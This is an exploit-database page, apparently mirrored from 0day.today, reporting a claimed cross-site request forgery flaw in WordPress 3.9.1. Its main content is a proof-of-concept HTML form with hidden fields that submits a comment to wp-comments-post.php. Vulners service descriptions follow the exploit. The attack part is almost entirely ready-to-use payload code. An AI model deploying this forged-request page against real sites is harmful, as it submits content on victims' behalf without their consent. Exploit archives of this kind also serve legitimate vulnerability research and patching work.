Lucene search
K

Wordpress 3.9.1 - CSRF Vulnerability

🗓️ 22 Jun 2014 00:00:00Reported by Avinash ThapaType 
zdt
 zdt
🔗 0day.today👁 40 Views

Wordpress 3.9.1 CSRF Vulnerability, Author Avinash Kumar Thapa, Exploit Code Availabl

Code
# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
 
# Author:Avinash Kumar Thapa
 
#URL: localhost/wordpress/
 
#PATCH/FIX:Not fixed yet.
 
###################################################################################################
 
Technical Details:
 
This is the new version released by Wordpress.
 
version is 3.9.1(Latest)
 
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
 
#####################################################################################################
 
Exploit Code:
 
<html>
 
  <!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
 
  <body>
 
    <form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
 
      <input type="hidden" name="author" value="Anonymous" />
 
      <input type="hidden" name="email" value="helloworld&#64;outlook&#46;com" />
 
      <input type="hidden" name="url" value="www&#46;random&#46;com" />
 
      <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
 
      <input type="hidden" name="submit" value="Post&#32;Comment" />
 
      <input type="hidden" name="comment&#95;post&#95;ID" value="1" />
 
      <input type="hidden" name="comment&#95;parent" value="0" />
 
      <input type="submit" value="Submit form" />
 
    </form>
 
  </body>
 
</html>

###########################################################################################################
----
-- Avinash
 
a.k.a
 
**SPID3R**

twitter: @m_avinash143<https://twitter.com/m_avinash143>

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation